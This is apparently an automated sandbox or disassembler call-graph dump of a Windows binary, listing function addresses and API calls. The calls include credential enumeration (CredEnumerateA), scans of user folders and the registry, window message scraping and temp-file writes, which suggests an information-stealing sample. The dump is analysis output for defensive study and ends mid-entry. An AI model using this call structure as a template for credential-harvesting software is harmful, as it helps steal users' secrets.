bc0585e 4629->4942 4947 bc06f5f 4629->4947 4982 bc02eff 4629->4982 4987 bc0441f 4629->4987 5058 bc048de 4629->5058 5065 bc02a37 4629->5065 5070 bc06e59 4629->5070 5084 bc03c57 4629->5084 5101 bc03c33 4629->5101 4650 bc093a2 4649->4650 4651 bc09459 4649->4651 4652 bc093a9 GlobalLock 4650->4652 4651->4596 4652->4651 4653 bc093c1 4652->4653 6085 bc08d51 LocalAlloc 4653->6085 4655 bc093d2 6086 bc08d51 LocalAlloc 4655->6086 4657 bc093e6 4658 bc093f6 GlobalUnlock 4657->4658 4659 bc0940c 4658->4659 4660 bc08d3d LocalFree 4659->4660 4661 bc09450 4660->4661 4662 bc08d3d LocalFree 4661->4662 4662->4651 4664 bc09222 4663->4664 4665 bc0924d 4663->4665 4666 bc0922a GlobalLock 4664->4666 4665->4599 4666->4665 4667 bc09239 4666->4667 4668 bc0930f 5 API calls 4667->4668 4669 bc09241 GlobalUnlock 4668->4669 4669->4665 4671 bc0929f 4670->4671 4676 bc092d3 4670->4676 4672 bc092ad GlobalLock 4671->4672 4671->4676 4673 bc092ba 4672->4673 4672->4676 4674 bc0930f 5 API calls 4673->4674 4675 bc092c5 GlobalUnlock 4674->4675 4675->4676 4676->4601 4678 bc0956e 4677->4678 4680 bc09612 4677->4680 4679 bc09575 GlobalLock 4678->4679 4679->4680 4681 bc09593 4679->4681 4682 bc09fdc __except_handler4 5 API calls 4680->4682 6087 bc08d51 LocalAlloc 4681->6087 4684 bc014b2 4682->4684 4684->4592 4684->4604 4685 bc0959a 4686 bc08d91 2 API calls 4685->4686 4687 bc095a8 GlobalUnlock lstrlenA 4686->4687 4688 bc095cd 4687->4688 4689 bc08d3d LocalFree 4688->4689 4689->4680 4691 bc09681 4690->4691 4692 bc0971d 4690->4692 4693 bc09688 GlobalLock 4691->4693 4694 bc09fdc __except_handler4 5 API calls 4692->4694 4693->4692 4695 bc096a2 4693->4695 4697 bc09738 4694->4697 6088 bc08d51 LocalAlloc 4695->6088 4697->4610 4698 bc096a9 4699 bc08d91 2 API calls 4698->4699 4700 bc096b7 GlobalUnlock 4699->4700 4701 bc096d7 4700->4701 4702 bc08d3d LocalFree 4701->4702 4702->4692 5106 bc08c9c 4703->5106 4705 bc02760 4706 bc02794 GetVersionExA 4705->4706 4708 bc027bb 4706->4708 4707 bc027f2 GetModuleHandleA 4709 bc02848 
4707->4709 4710 bc0280b GetProcAddress 4707->4710 4708->4707 4714 bc0284f LocalAlloc GetLocaleInfoA 4709->4714 4710->4709 4711 bc0281d GetProcAddress 4710->4711 4712 bc0283b 4711->4712 4713 bc0282b GetCurrentProcess 4711->4713 4712->4709 4713->4712 4716 bc02886 4714->4716 4715 bc028a5 GetLocaleInfoA 4717 bc028bf 4715->4717 4716->4715 4718 bc028d6 AllocateAndInitializeSid 4717->4718 4719 bc0290d CheckTokenMembership 4718->4719 4721 bc02909 4718->4721 4720 bc02925 FreeSid 4719->4720 4719->4721 4720->4721 5110 bc026a0 4721->5110 4725 bc08d3d LocalFree 4726 bc029b3 4725->4726 4727 bc08d3d LocalFree 4726->4727 4729 bc029be GetModuleHandleA 4727->4729 4728 bc0294c 4728->4725 4730 bc029ea GetSystemInfo 4729->4730 4731 bc029cf GetProcAddress 4729->4731 4733 bc029f7 4730->4733 4731->4730 4732 bc029df GetNativeSystemInfo 4731->4732 4732->4733 4734 bc09fdc __except_handler4 5 API calls 4733->4734 4735 bc02a35 4734->4735 4735->4629 4737 bc08c9c 5 API calls 4736->4737 4738 bc02225 4737->4738 5230 bc023a1 4738->5230 4741 bc08ebd 6 API calls 4742 bc0224b 4741->4742 4743 bc02266 4742->4743 5256 bc0231e 4742->5256 4745 bc08dda 6 API calls 4743->4745 4747 bc0227e 4745->4747 4749 bc02299 4747->4749 4751 bc0231e 26 API calls 4747->4751 4748 bc08d3d LocalFree 4748->4743 4750 bc08dda 6 API calls 4749->4750 4752 bc022a9 4750->4752 4753 bc02290 4751->4753 4754 bc022c1 4752->4754 4756 bc0231e 26 API calls 4752->4756 4755 bc08d3d LocalFree 4753->4755 4757 bc08dda 6 API calls 4754->4757 4755->4749 4758 bc022ba 4756->4758 4759 bc022d4 4757->4759 4760 bc08d3d LocalFree 4758->4760 4761 bc022ec 4759->4761 4763 bc0231e 26 API calls 4759->4763 4760->4754 5247 bc02516 4761->5247 4765 bc022e5 4763->4765 4767 bc08d3d LocalFree 4765->4767 4766 bc02516 32 API calls 4768 bc02301 4766->4768 4767->4761 4769 bc02516 32 API calls 4768->4769 4770 bc0230b 4769->4770 4770->4629 4772 bc08c9c 5 API calls 4771->4772 4773 bc073c7 CredEnumerateA 4772->4773 4774 bc07424 4773->4774 4779 bc073eb 4773->4779 5364 
bc091be LocalAlloc SHGetFolderPathA 4774->5364 4776 bc0742b 4777 bc07451 4776->4777 5365 bc01fd3 4776->5365 4777->4629 4778 bc0741b CredFree 4778->4774 4779->4774 4779->4778 5390 bc07121 4779->5390 4783 bc08d3d LocalFree 4783->4777 4785 bc08c9c 5 API calls 4784->4785 4786 bc061bf 4785->4786 5493 bc02a67 4786->5493 4788 bc061cf 4788->4629 4790 bc08c9c 5 API calls 4789->4790 4791 bc0583a 4790->4791 5516 bc057c3 4791->5516 4793 bc05850 4793->4629 4795 bc08c9c 5 API calls 4794->4795 4796 bc06dd1 GetCurrentDirectoryA 4795->4796 5537 bc0689e StrStrIA 4796->5537 4799 bc0689e 91 API calls 4800 bc06e29 SetCurrentDirectoryA 4799->4800 4801 bc06e4a 4800->4801 4802 bc09fdc __except_handler4 5 API calls 4801->4802 4803 bc06e57 4802->4803 4803->4629 5673 bc088c9 lstrlenA LocalAlloc lstrcpyA 4804->5673 4807 bc088c9 8 API calls 4808 bc06036 4807->4808 4809 bc088c9 8 API calls 4808->4809 4810 bc0604d 4809->4810 4811 bc088c9 8 API calls 4810->4811 4812 bc06064 4811->4812 4813 bc088c9 8 API calls 4812->4813 4814 bc0607b 4813->4814 4815 bc08c9c 5 API calls 4814->4815 4816 bc06094 LoadLibraryA 4815->4816 4817 bc060e1 4816->4817 4818 bc060a9 GetProcAddress 4816->4818 5677 bc05b39 RegOpenKeyA 4817->5677 4820 bc060be 4818->4820 4820->4817 5699 bc04a80 4820->5699 4822 bc08ee2 5 API calls 4823 bc060f9 4822->4823 5688 bc05c29 RegOpenKeyA 4823->5688 4828 bc08d3d LocalFree 4829 bc0610e 4828->4829 4830 bc08dda 6 API calls 4829->4830 4831 bc06126 4830->4831 4832 bc06147 4831->4832 4833 bc08f32 6 API calls 4831->4833 4834 bc05b39 33 API calls 4832->4834 4835 bc06138 4833->4835 4836 bc06153 4834->4836 4837 bc05b39 33 API calls 4835->4837 4838 bc05c29 36 API calls 4836->4838 4840 bc06141 4837->4840 4839 bc0615e 4838->4839 4841 bc05c29 36 API calls 4839->4841 4842 bc08d3d LocalFree 4840->4842 4843 bc06169 4841->4843 4842->4832 4844 bc05c29 36 API calls 4843->4844 4845 bc06174 4844->4845 4846 bc05c29 36 API calls 4845->4846 4847 bc0617f 4846->4847 4848 bc0618b LocalFree LocalFree LocalFree LocalFree 
LocalFree 4847->4848 4848->4629 4850 bc08c9c 5 API calls 4849->4850 4851 bc05565 LoadLibraryA GetProcAddress 4850->4851 4852 bc0558c 4851->4852 4854 bc04a80 CoTaskMemFree 4852->4854 4856 bc055a5 4852->4856 4854->4856 5772 bc0509b CoCreateInstance 4856->5772 4860 bc055c6 4860->4629 4862 bc08c9c 5 API calls 4861->4862 4863 bc04136 4862->4863 5866 bc03fd6 4863->5866 4866 bc03fd6 35 API calls 4867 bc04168 4866->4867 4868 bc03fd6 35 API calls 4867->4868 4869 bc04178 4868->4869 4870 bc03fd6 35 API calls 4869->4870 4871 bc04188 4870->4871 4872 bc03fd6 35 API calls 4871->4872 4873 bc04199 4872->4873 4874 bc03fd6 35 API calls 4873->4874 4875 bc041ac 4874->4875 4876 bc03fd6 35 API calls 4875->4876 4877 bc041bc 4876->4877 4878 bc03fd6 35 API calls 4877->4878 4879 bc041cc 4878->4879 4880 bc03fd6 35 API calls 4879->4880 4881 bc041df 4880->4881 4882 bc03fd6 35 API calls 4881->4882 4883 bc041f3 4882->4883 4884 bc03fd6 35 API calls 4883->4884 4885 bc04207 4884->4885 4886 bc03fd6 35 API calls 4885->4886 4887 bc0421e 4886->4887 4888 bc03fd6 35 API calls 4887->4888 4889 bc0422e 4888->4889 4890 bc03fd6 35 API calls 4889->4890 4891 bc0423e 4890->4891 4892 bc03fd6 35 API calls 4891->4892 4893 bc0424e 4892->4893 4894 bc03fd6 35 API calls 4893->4894 4895 bc0425e 4894->4895 4896 bc03fd6 35 API calls 4895->4896 4897 bc04273 4896->4897 4898 bc03fd6 35 API calls 4897->4898 4899 bc04287 4898->4899 5887 bc040cd 4899->5887 4902 bc040cd 32 API calls 4903 bc04297 4902->4903 4904 bc040cd 32 API calls 4903->4904 4905 bc0429f 4904->4905 4905->4629 4907 bc08c9c 5 API calls 4906->4907 4908 bc07477 4907->4908 5924 bc091be LocalAlloc SHGetFolderPathA 4908->5924 4910 bc07481 4911 bc08f32 6 API calls 4910->4911 4912 bc0748e CreateStreamOnHGlobal 4911->4912 4913 bc08a86 8 API calls 4912->4913 4914 bc074a9 4913->4914 4915 bc037e4 14 API calls 4914->4915 4916 bc074bf 4914->4916 4915->4916 4916->4629 4918 bc08c9c 5 API calls 4917->4918 4919 bc03f32 4918->4919 5925 bc03e8c 4919->5925 4922 bc03e8c 37 API calls 
4923 bc03f44 4922->4923 4924 bc03e8c 37 API calls 4923->4924 4925 bc03f4c 4924->4925 4926 bc03e8c 37 API calls 4925->4926 4927 bc03f54 4926->4927 5954 bc03cdf 4927->5954 4930 bc03cdf 6 API calls 4931 bc03f6c 4930->4931 4932 bc03cdf 6 API calls 4931->4932 4933 bc03f77 4932->4933 4934 bc03cdf 6 API calls 4933->4934 4935 bc03f82 4934->4935 4936 bc03cdf 6 API calls 4935->4936 4937 bc03f8d 4936->4937 4938 bc03cdf 6 API calls 4937->4938 4939 bc03f98 4938->4939 4940 bc03cdf 6 API calls 4939->4940 4941 bc03fa3 4940->4941 4941->4629 4943 bc08c9c 5 API calls 4942->4943 4944 bc0586c 4943->4944 4945 bc057c3 54 API calls 4944->4945 4946 bc05882 4945->4946 4946->4629 4948 bc08c9c 5 API calls 4947->4948 4949 bc06f75 LocalAlloc LocalAlloc LocalAlloc FindWindowExA 4948->4949 4950 bc06fb6 FindWindowExA 4949->4950 4958 bc0707c 4949->4958 4951 bc06fcb FindWindowExA 4950->4951 4950->4958 4952 bc07043 FindWindowExA 4951->4952 4953 bc06fdc SendMessageA FindWindowExA 4951->4953 4957 bc07048 GetClassNameA 4952->4957 4952->4958 4955 bc07001 SendMessageA 4953->4955 4953->4958 4954 bc08d3d LocalFree 4959 bc07109 4954->4959 4955->4958 4960 bc07013 4955->4960 4957->4952 4961 bc07059 StrStrIA 4957->4961 4958->4954 4962 bc08d3d LocalFree 4959->4962 4967 bc08c6d lstrlenA 4960->4967 4961->4952 4963 bc0707e SendMessageW 4961->4963 4964 bc07111 4962->4964 4965 bc09be0 4 API calls 4963->4965 4966 bc08d3d LocalFree 4964->4966 4968 bc0709a 4965->4968 4969 bc07119 4966->4969 4970 bc07031 4967->4970 4971 bc08d3d LocalFree 4968->4971 4969->4629 4972 bc08c6d lstrlenA 4970->4972 4973 bc070a3 FindWindowExA SendMessageW 4971->4973 4981 bc0703b 4972->4981 4974 bc09be0 4 API calls 4973->4974 4975 bc070c2 4974->4975 4976 bc08d3d LocalFree 4975->4976 4977 bc070cb 4976->4977 4978 bc08c6d lstrlenA 4977->4978 4979 bc070e9 4978->4979 4980 bc08c6d lstrlenA 4979->4980 4980->4981 4981->4958 4983 bc08c9c 5 API calls 4982->4983 4984 bc02f0f 4983->4984 4985 bc02a67 50 API calls 4984->4985 4986 bc02f1f 4985->4986 4986->4629 
4988 bc08c9c 5 API calls 4987->4988 4989 bc04433 LocalAlloc GetWindowsDirectoryA 4988->4989 4990 bc04466 4989->4990 4991 bc04458 4989->4991 4992 bc08d3d LocalFree 4990->4992 4991->4990 4993 bc0445c 4991->4993 4994 bc04463 4992->4994 5986 bc042c9 4993->5986 6040 bc091be LocalAlloc SHGetFolderPathA 4994->6040 4997 bc04474 4998 bc042c9 35 API calls 4997->4998 4999 bc0447b 4998->4999 6041 bc091be LocalAlloc SHGetFolderPathA 4999->6041 5001 bc04482 5002 bc0449c 5001->5002 5003 bc08f32 6 API calls 5001->5003 6042 bc091be LocalAlloc SHGetFolderPathA 5002->6042 5005 bc04495 5003->5005 5008 bc042c9 35 API calls 5005->5008 5006 bc044a6 5007 bc044b9 5006->5007 5009 bc08f32 6 API calls 5006->5009 6043 bc091be LocalAlloc SHGetFolderPathA 5007->6043 5008->5002 5011 bc044b2 5009->5011 5013 bc042c9 35 API calls 5011->5013 5012 bc044c3 5014 bc044d6 5012->5014 5015 bc08f32 6 API calls 5012->5015 5013->5007 5016 bc08ebd 6 API calls 5014->5016 5017 bc044cf 5015->5017 5018 bc044f2 5016->5018 5020 bc042c9 35 API calls 5017->5020 5019 bc042c9 35 API calls 5018->5019 5021 bc044f9 5019->5021 5020->5014 5022 bc08ebd 6 API calls 5021->5022 5023 bc0450d 5022->5023 5024 bc04528 5023->5024 6044 bc042b1 5023->6044 5026 bc08ebd 6 API calls 5024->5026 5028 bc0453a 5026->5028 5030 bc042c9 35 API calls 5028->5030 5029 bc08d3d LocalFree 5029->5024 5031 bc04543 5030->5031 5032 bc08ebd 6 API calls 5031->5032 5033 bc04552 5032->5033 5034 bc0456a 5033->5034 5035 bc042b1 22 API calls 5033->5035 5036 bc08dda 6 API calls 5034->5036 5037 bc04564 5035->5037 5038 bc04582 5036->5038 5039 bc08d3d LocalFree 5037->5039 5040 bc042c9 35 API calls 5038->5040 5039->5034 5041 bc0458b 5040->5041 5042 bc08dda 6 API calls 5041->5042 5043 bc0459b 5042->5043 5044 bc045b6 5043->5044 5046 bc042b1 22 API calls 5043->5046 5045 bc08dda 6 API calls 5044->5045 5047 bc045ca 5045->5047 5048 bc045ae 5046->5048 5049 bc042c9 35 API calls 5047->5049 5050 bc08d3d LocalFree 5048->5050 5051 bc045d3 5049->5051 5050->5044 5052 bc08dda 6 API 
calls 5051->5052 5053 bc045df 5052->5053 5054 bc045f7 5053->5054 5055 bc042b1 22 API calls 5053->5055 5054->4629 5056 bc045f1 5055->5056 5057 bc08d3d LocalFree 5056->5057 5057->5054 5059 bc08c9c 5 API calls 5058->5059 5060 bc048f0 5059->5060 6047 bc0460a RegOpenKeyA 5060->6047 5063 bc0460a 19 API calls 5064 bc0490f 5063->5064 5064->4629 5066 bc08c9c 5 API calls 5065->5066 5067 bc02a47 5066->5067 5068 bc02a67 50 API calls 5067->5068 5069 bc02a57 5068->5069 5069->4629 5071 bc08c9c 5 API calls 5070->5071 5072 bc06e7f GetCurrentDirectoryA 5071->5072 5073 bc0689e 91 API calls 5072->5073 5074 bc06ec4 5073->5074 5075 bc0689e 91 API calls 5074->5075 5076 bc06eda SetCurrentDirectoryA GetCurrentDirectoryA 5075->5076 5077 bc0689e 91 API calls 5076->5077 5078 bc06f19 5077->5078 5079 bc0689e 91 API calls 5078->5079 5080 bc06f2f SetCurrentDirectoryA 5079->5080 5081 bc06f50 5080->5081 5082 bc09fdc __except_handler4 5 API calls 5081->5082 5083 bc06f5d 5082->5083 5083->4629 5085 bc08c9c 5 API calls 5084->5085 5086 bc03c6b 5085->5086 6060 bc02175 5086->6060 5089 bc02175 50 API calls 5090 bc03c7f 5089->5090 5091 bc02175 50 API calls 5090->5091 5092 bc03c87 5091->5092 5093 bc08dda 6 API calls 5092->5093 5094 bc03ca0 5093->5094 5095 bc08f32 6 API calls 5094->5095 5096 bc03ccf 5094->5096 5097 bc03cb2 5095->5097 5096->4629 5098 bc01fd3 48 API calls 5097->5098 5099 bc03cc6 5098->5099 5100 bc08d3d LocalFree 5099->5100 5100->5096 5102 bc08c9c 5 API calls 5101->5102 5103 bc03c41 5102->5103 6070 bc03972 RegOpenKeyA 5103->6070 5105 bc03c4c 5105->4629 5107 bc08cbc 5106->5107 5108 bc09fdc __except_handler4 5 API calls 5107->5108 5109 bc08d0a 5108->5109 5109->4705 5111 bc099b0 30 API calls 5110->5111 5112 bc026b9 5111->5112 5113 bc026cc CoCreateGuid 5112->5113 5114 bc026c4 5112->5114 5115 bc026da wsprintfA lstrlenA 5113->5115 5120 bc026ca 5113->5120 5118 bc08d3d LocalFree 5114->5118 5150 bc09812 RegCreateKeyA 5115->5150 5117 bc09fdc __except_handler4 5 API calls 5119 bc0273f 5117->5119 5118->5120 
5121 bc099b0 5119->5121 5120->5117 5196 bc08ebd 5121->5196 5124 bc099eb GetTempPathA 5126 bc09acf 5124->5126 5127 bc09a07 5124->5127 5125 bc09fdc __except_handler4 5 API calls 5128 bc09af2 5125->5128 5126->5125 5127->5126 5129 bc09a0f CreateStreamOnHGlobal 5127->5129 5128->4728 5130 bc08f95 lstrlenA 5129->5130 5131 bc09a2b 5130->5131 5132 bc09a32 5131->5132 5133 bc09a48 5131->5133 5134 bc08ee2 5 API calls 5132->5134 5135 bc08ee2 5 API calls 5133->5135 5136 bc09a3c 5134->5136 5137 bc09a43 5135->5137 5138 bc08f32 6 API calls 5136->5138 5200 bc08a86 5137->5200 5138->5137 5140 bc09a62 5141 bc09ac4 5140->5141 5143 bc09a78 GetHGlobalFromStream 5140->5143 5142 bc08d3d LocalFree 5141->5142 5142->5126 5143->5141 5144 bc09a8f GlobalLock 5143->5144 5144->5141 5145 bc09aa1 5144->5145 5210 bc08d51 LocalAlloc 5145->5210 5147 bc09aa8 5211 bc08d91 GetModuleHandleA GetProcAddress 5147->5211 5151 bc09893 GetTempPathA 5150->5151 5152 bc09859 RegSetValueExA 5150->5152 5153 bc098ae 5151->5153 5176 bc0999a 5151->5176 5154 bc09871 5152->5154 5155 bc0987b RegCloseKey 5152->5155 5156 bc098b6 CreateDirectoryA 5153->5156 5153->5176 5154->5155 5155->5151 5155->5176 5177 bc08f95 5156->5177 5157 bc09fdc __except_handler4 5 API calls 5159 bc099ae 5157->5159 5159->5120 5161 bc098d6 5181 bc08ee2 5161->5181 5162 bc098ee 5164 bc08ee2 5 API calls 5162->5164 5166 bc098e9 CreateFileA 5164->5166 5165 bc098e0 5186 bc08f32 5165->5186 5169 bc09983 DeleteFileA 5166->5169 5173 bc0991a 5166->5173 5170 bc0998f 5169->5170 5172 bc08d3d LocalFree 5170->5172 5171 bc0991f WriteFile 5171->5173 5174 bc0995d CloseHandle 5171->5174 5172->5176 5173->5171 5173->5174 5174->5169 5174->5170 5176->5157 5178 bc08fac 5177->5178 5179 bc08f99 5177->5179 5178->5161 5178->5162 5179->5178 5180 bc08f9e lstrlenA 5179->5180 5180->5178 5182 bc08ef5 lstrlenA lstrlenA 5181->5182 5194 bc08d51 LocalAlloc 5182->5194 5185 bc08f17 lstrcpyA lstrcatA 5185->5165 5187 bc08f43 lstrlenA lstrlenA 5186->5187 5195 bc08d51 LocalAlloc 5187->5195 5190 
bc08f6a lstrcpyA lstrcatA 5191 bc08f85 5190->5191 5192 bc08f8d 5190->5192 5193 bc08d3d LocalFree 5191->5193 5192->5166 5193->5192 5194->5185 5195->5190 5197 bc08ec7 5196->5197 5213 bc08dda 5197->5213 5228 bc0b780 5200->5228 5203 bc08ac4 5205 bc09fdc __except_handler4 5 API calls 5203->5205 5204 bc08ad5 ReadFile 5206 bc08b16 FindCloseChangeNotification 5204->5206 5208 bc08ad4 5204->5208 5207 bc08ad2 5205->5207 5206->5203 5207->5140 5208->5204 5209 bc08b13 5208->5209 5209->5206 5210->5147 5212 bc08db6 GlobalUnlock 5211->5212 5212->5141 5214 bc08dee RegOpenKeyExA 5213->5214 5216 bc08e24 RegQueryValueExA 5214->5216 5217 bc08e98 5214->5217 5218 bc08e41 5216->5218 5219 bc08e89 RegCloseKey 5216->5219 5220 bc08eb0 5217->5220 5221 bc08dda 2 API calls 5217->5221 5218->5219 5227 bc08d51 LocalAlloc 5218->5227 5219->5217 5219->5220 5220->5124 5220->5126 5221->5220 5223 bc08e59 RegQueryValueExA 5224 bc08e6f 5223->5224 5226 bc08e77 5223->5226 5225 bc08d3d LocalFree 5224->5225 5225->5226 5226->5219 5227->5223 5229 bc08a93 CreateFileA 5228->5229 5229->5203 5229->5208 5276 bc0254b 5230->5276 5233 bc0254b 7 API calls 5234 bc02423 5233->5234 5235 bc0254b 7 API calls 5234->5235 5236 bc02456 RegOpenKeyA 5235->5236 5237 bc02474 5236->5237 5238 bc02507 5236->5238 5240 bc024e5 RegEnumKeyExA 5237->5240 5243 bc08ee2 5 API calls 5237->5243 5244 bc08f32 6 API calls 5237->5244 5245 bc023a1 20 API calls 5237->5245 5246 bc08d3d LocalFree 5237->5246 5239 bc09fdc __except_handler4 5 API calls 5238->5239 5242 bc02237 5239->5242 5240->5237 5241 bc024fb RegCloseKey 5240->5241 5241->5238 5242->4741 5243->5237 5244->5237 5245->5237 5246->5237 5314 bc091be LocalAlloc SHGetFolderPathA 5247->5314 5249 bc02523 5250 bc08f32 6 API calls 5249->5250 5255 bc022f7 5249->5255 5251 bc02533 5250->5251 5252 bc0231e 26 API calls 5251->5252 5253 bc0253d 5252->5253 5254 bc08d3d LocalFree 5253->5254 5254->5255 5255->4766 5257 bc0232a 5256->5257 5258 bc0225d 5256->5258 5259 bc08ee2 5 API calls 5257->5259 5258->4748 5260 
bc02335 5259->5260 5315 bc01f01 5260->5315 5263 bc08d3d LocalFree 5264 bc0234f 5263->5264 5265 bc08ee2 5 API calls 5264->5265 5266 bc0235b 5265->5266 5267 bc01f01 22 API calls 5266->5267 5268 bc0236c 5267->5268 5269 bc08d3d LocalFree 5268->5269 5270 bc02375 5269->5270 5271 bc08ee2 5 API calls 5270->5271 5272 bc02381 5271->5272 5273 bc01f01 22 API calls 5272->5273 5274 bc02392 5273->5274 5275 bc08d3d LocalFree 5274->5275 5275->5258 5277 bc08ebd 6 API calls 5276->5277 5278 bc02569 5277->5278 5279 bc08ebd 6 API calls 5278->5279 5280 bc02578 5279->5280 5281 bc08ebd 6 API calls 5280->5281 5282 bc02587 5281->5282 5283 bc08ebd 6 API calls 5282->5283 5284 bc02599 5283->5284 5285 bc08ebd 6 API calls 5284->5285 5286 bc025a8 5285->5286 5287 bc08ebd 6 API calls 5286->5287 5292 bc025ba 5287->5292 5288 bc08d3d LocalFree 5289 bc02670 5288->5289 5290 bc08d3d LocalFree 5289->5290 5291 bc02678 5290->5291 5293 bc08d3d LocalFree 5291->5293 5310 bc02643 5292->5310 5311 bc08c6d 5292->5311 5295 bc02680 5293->5295 5297 bc08d3d LocalFree 5295->5297 5296 bc025f0 5298 bc08c6d lstrlenA 5296->5298 5299 bc02688 5297->5299 5300 bc025fa 5298->5300 5302 bc08d3d LocalFree 5299->5302 5301 bc08c6d lstrlenA 5300->5301 5304 bc02604 5301->5304 5303 bc02690 5302->5303 5305 bc08d3d LocalFree 5303->5305 5307 bc08c6d lstrlenA 5304->5307 5308 bc0261a 5304->5308 5306 bc023f7 5305->5306 5306->5233 5307->5308 5309 bc08c6d lstrlenA 5308->5309 5309->5310 5310->5288 5312 bc08c79 lstrlenA 5311->5312 5313 bc08c8a 5311->5313 5312->5313 5313->5296 5314->5249 5329 bc08fb7 ExpandEnvironmentStringsA 5315->5329 5318 bc01f6b 5318->5263 5320 bc01f1f 5321 bc01f23 5320->5321 5322 bc01f65 5320->5322 5341 bc08ff4 5321->5341 5323 bc08d3d LocalFree 5322->5323 5323->5318 5326 bc01f45 5355 bc0907f 5326->5355 5330 bc08fd2 5329->5330 5335 bc01f11 5329->5335 5358 bc08d51 LocalAlloc 5330->5358 5332 bc08fd7 ExpandEnvironmentStringsA 5333 bc08fe4 5332->5333 5332->5335 5334 bc08d3d LocalFree 5333->5334 5334->5335 5335->5318 5336 bc090fc 
5335->5336 5337 bc09102 5336->5337 5338 bc09128 5336->5338 5337->5338 5339 bc09106 CreateFileA 5337->5339 5338->5320 5339->5338 5340 bc0911d FindCloseChangeNotification 5339->5340 5340->5320 5359 bc08d5e 5341->5359 5343 bc09004 CreateFileA 5344 bc01f2c 5343->5344 5345 bc09026 GetFileSize CreateFileMappingA 5343->5345 5344->5322 5344->5326 5349 bc0909f 5344->5349 5346 bc09042 MapViewOfFile 5345->5346 5347 bc09069 CloseHandle 5345->5347 5346->5344 5348 bc09058 CloseHandle CloseHandle 5346->5348 5347->5344 5348->5344 5350 bc090b2 5349->5350 5351 bc090aa 5349->5351 5353 bc090ce LocalAlloc 5350->5353 5354 bc090f1 5350->5354 5360 bc0930f 5351->5360 5353->5354 5354->5326 5356 bc09084 UnmapViewOfFile CloseHandle CloseHandle 5355->5356 5357 bc0909e 5355->5357 5356->5357 5357->5322 5358->5332 5359->5343 5361 bc09325 5360->5361 5362 bc09fdc __except_handler4 5 API calls 5361->5362 5363 bc0937e 5362->5363 5363->5350 5364->4776 5366 bc02014 5365->5366 5367 bc02156 5365->5367 5366->5367 5370 bc08f95 lstrlenA 5366->5370 5368 bc08d3d LocalFree 5367->5368 5369 bc0215f 5368->5369 5371 bc09fdc __except_handler4 5 API calls 5369->5371 5372 bc02022 5370->5372 5373 bc02171 5371->5373 5374 bc08ee2 5 API calls 5372->5374 5373->4783 5375 bc02036 5374->5375 5376 bc0204c FindFirstFileA 5375->5376 5376->5367 5385 bc02068 5376->5385 5377 bc02074 lstrcmpiA 5379 bc02135 FindNextFileA 5377->5379 5380 bc0208e lstrcmpiA 5377->5380 5378 bc020e6 StrStrIA 5378->5379 5378->5385 5381 bc0214c FindClose 5379->5381 5379->5385 5380->5379 5380->5385 5381->5367 5382 bc08ee2 LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 5382->5385 5383 bc08f95 lstrlenA 5383->5385 5384 bc01f01 22 API calls 5384->5385 5385->5377 5385->5378 5385->5379 5385->5382 5385->5383 5385->5384 5386 bc08f32 6 API calls 5385->5386 5387 bc08d3d LocalFree 5385->5387 5388 bc01fd3 42 API calls 5385->5388 5403 bc02b0b CreateStreamOnHGlobal 5385->5403 5386->5385 5387->5385 5388->5385 5391 bc0713b 5390->5391 5392 bc08c6d lstrlenA 5391->5392 5393 
bc07145 5392->5393 5394 bc08c6d lstrlenA 5393->5394 5396 bc0714f 5394->5396 5395 bc07170 StrStrIA 5397 bc07184 lstrlenA StrStrIA 5395->5397 5402 bc071ce 5395->5402 5396->5395 5398 bc0719d 5397->5398 5490 bc01798 inet_addr 5398->5490 5400 bc071ab 5401 bc08c6d lstrlenA 5400->5401 5400->5402 5401->5402 5402->4779 5404 bc08a86 8 API calls 5403->5404 5405 bc02b2a 5404->5405 5406 bc02b42 5405->5406 5408 bc037e4 5405->5408 5406->5385 5412 bc03816 5408->5412 5409 bc0395d 5410 bc09fdc __except_handler4 5 API calls 5409->5410 5411 bc03970 5410->5411 5411->5406 5412->5409 5414 bc0341e 5412->5414 5415 bc03433 5414->5415 5417 bc0343b 5414->5417 5415->5409 5416 bc03525 LocalAlloc 5418 bc03540 5416->5418 5417->5415 5417->5416 5426 bc0358b 5418->5426 5427 bc035a9 5418->5427 5430 bc03635 5418->5430 5419 bc08d3d LocalFree 5419->5415 5420 bc03777 5423 bc08d3d LocalFree 5420->5423 5421 bc03611 5422 bc0341e 8 API calls 5421->5422 5424 bc03625 5422->5424 5425 bc03780 5423->5425 5424->5420 5424->5426 5426->5419 5427->5421 5427->5426 5428 bc0341e 8 API calls 5427->5428 5428->5427 5430->5420 5430->5426 5432 bc08d3d LocalFree 5430->5432 5434 bc02fb8 5430->5434 5441 bc03294 5430->5441 5457 bc02b55 5430->5457 5432->5430 5435 bc02fd6 5434->5435 5436 bc02fcf 5434->5436 5467 bc08d51 LocalAlloc 5435->5467 5436->5430 5438 bc02fdb CreateStreamOnHGlobal 5440 bc02ff7 5438->5440 5439 bc08d3d LocalFree 5439->5436 5440->5439 5442 bc033dc 5441->5442 5443 bc032b4 5441->5443 5442->5430 5443->5442 5468 bc08d51 LocalAlloc 5443->5468 5445 bc0340e 5446 bc08d3d LocalFree 5445->5446 5446->5442 5447 bc033cc 5448 bc08d3d LocalFree 5447->5448 5448->5442 5450 bc0331e 5450->5445 5450->5447 5469 bc08d51 LocalAlloc 5450->5469 5452 bc033e2 5454 bc08d3d LocalFree 5452->5454 5455 bc033f0 5452->5455 5453 bc0338a 5453->5447 5453->5452 5453->5455 5470 bc030f9 5453->5470 5454->5455 5455->5445 5456 bc08d3d LocalFree 5455->5456 5456->5455 5458 bc02b68 5457->5458 5466 bc02c55 5457->5466 5459 bc02b8a lstrcmpiA 5458->5459 
5458->5466 5460 bc02ba0 5459->5460 5459->5466 5461 bc02bb6 lstrcmpA 5460->5461 5460->5466 5462 bc02bcc 5461->5462 5461->5466 5462->5466 5488 bc03786 StrStrIA 5462->5488 5465 bc0341e 7 API calls 5465->5466 5466->5430 5467->5438 5468->5450 5469->5453 5471 bc03110 5470->5471 5472 bc031c9 5470->5472 5473 bc03189 5471->5473 5474 bc03132 5471->5474 5475 bc03117 5471->5475 5479 bc031df 5472->5479 5480 bc03213 5472->5480 5483 bc08d51 LocalAlloc 5473->5483 5478 bc030c7 LocalAlloc GetModuleHandleA GetProcAddress 5474->5478 5477 bc08d51 LocalAlloc 5475->5477 5476 bc0311f 5476->5453 5477->5476 5478->5476 5481 bc08d51 LocalAlloc 5479->5481 5480->5476 5482 bc08d51 LocalAlloc 5480->5482 5484 bc031eb 5481->5484 5482->5484 5483->5476 5485 bc030c7 LocalAlloc GetModuleHandleA GetProcAddress 5484->5485 5486 bc03202 5485->5486 5487 bc08d3d 